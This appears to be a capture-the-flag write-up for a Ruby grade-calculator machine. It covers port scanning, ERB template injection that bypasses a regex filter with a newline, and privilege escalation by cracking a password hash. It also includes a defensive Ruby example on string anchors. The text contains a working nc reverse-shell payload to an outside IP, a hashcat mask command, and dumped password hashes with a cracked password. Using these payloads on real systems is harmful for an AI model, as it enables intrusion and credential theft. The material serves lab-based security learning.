Basic information

Port scan

22 and 80:

$ nmap -sC -sV 10.10.11.253
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-04 13:42 CST
Nmap scan report for 10.10.11.253
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)
|_ 256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)
80/tcp open http nginx
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.33 seconds

80

An online weighted grade calculator:

weighted-grade-calc

At the bottom of the page you can see WEBrick 1.7.0. The feature under test takes a category, grade and weight for each entry and computes the weighted grade, and the result echoes back the category we entered:

SSTI

From the WEBrick banner seen earlier we know this is Ruby; trying the usual SSTI probes shows that input is being filtered:

crlf bypass

Such filtering is usually implemented with a regex or similar, and a very common Ruby pitfall is that the regex anchors only match a single line, so a newline in the input bypasses it:
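The anchor mistake described above, as an added example that is not code from the original write-up or from the target application: a line-anchored check versus a string-anchored one, and, beside it, the rendering pattern that keeps user input out of the template source altogether. The category names and the rendering functions are constructed for this demonstration.

```ruby
require 'erb'

# Added example, not code from the original write-up. Two defender-side points:
# (1) why a Ruby input check built on ^ and $ lets a newline slip through, and
# (2) that handing user input to ERB as data rather than as template text
#     removes the injection entirely.
#
# In Ruby, ^ and $ are *line* anchors: a string whose first line is clean
# satisfies /^...$/ even when a later line contains an ERB tag. \A and \z
# anchor to the whole string (\z, not \Z, which still permits a trailing "\n").
WEAK_PATTERN   = /^[a-zA-Z ]+$/
STRICT_PATTERN = /\A[a-zA-Z ]+\z/

def weak_category_ok?(category)
  category.match?(WEAK_PATTERN)
end

def strict_category_ok?(category)
  category.match?(STRICT_PATTERN)
end

# Unsafe pattern: the user's value becomes part of the template source, so any
# ERB tag inside it is evaluated (harmless arithmetic here, only to show the gap).
def render_by_concatenation(category)
  ERB.new("Category: #{category}").result(binding)
end

# Safe pattern: the template is fixed and the value arrives as data, so a tag
# inside the value is plain text and is printed literally.
def render_as_data(category)
  ERB.new("Category: <%= category %>").result_with_hash(category: category)
end

# Constructed inputs for the demonstration.
CLEAN    = "Homework"
SMUGGLED = "Homework\n<%= 1 + 1 %>"

if __FILE__ == $0
  puts weak_category_ok?(SMUGGLED)        # true:  line-anchored check is fooled
  puts strict_category_ok?(SMUGGLED)      # false: string-anchored check rejects it
  puts render_by_concatenation(SMUGGLED)  # "Category: Homework\n2"
  puts render_as_data(SMUGGLED)           # "Category: Homework\n<%= 1 + 1 %>"
end
```

The same two anchors also decide whether a trailing newline is accepted, which is why `\z` rather than `\Z` is the right closing anchor for an allow-list check.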

shell

URL-encode the payload and we land a shell as the susan user:

<%= system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.8 4444 >/tmp/f') %>

user flag

In susan's home directory, write our public key to make the later steps easier:

Privilege escalation information

susan is already in the sudo group but a password is required. On login there is a notice of new mail, and reading it gives the password rule:

There is also a sqlite file from which susan's hash can be recovered:

1|Susan Miller|abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f

hash crack

Now that we have both the password rule and the hash, this is an offline password crack:

# susan_nasus_1-1,000,000,000
# from 1 to 10 digits
hashcat -m 1400 hash.txt -a 3 "susan_nasus_?d?d?d?d?d?d?d?d?d?d"

susan_nasus_413759210

Privilege escalation & root flag

With susan's password cracked, it is simply a direct sudo:

shadow

root:$y$j9T$71hm.H7E.Jek01MNCWa.d0$FoTA1/EWWEDDDeMklpfTV9CmxBPoan8E0s3krRMPj2/:19490:0:99999:7:::
susan:$y$j9T$lDiE.68crplrSJzmhskuH0$KC/O4ZHNz2p8OfWz1bfk9rxwhTkGdViBHgSo.2s1Ci5:19490:0:99999:7:::

References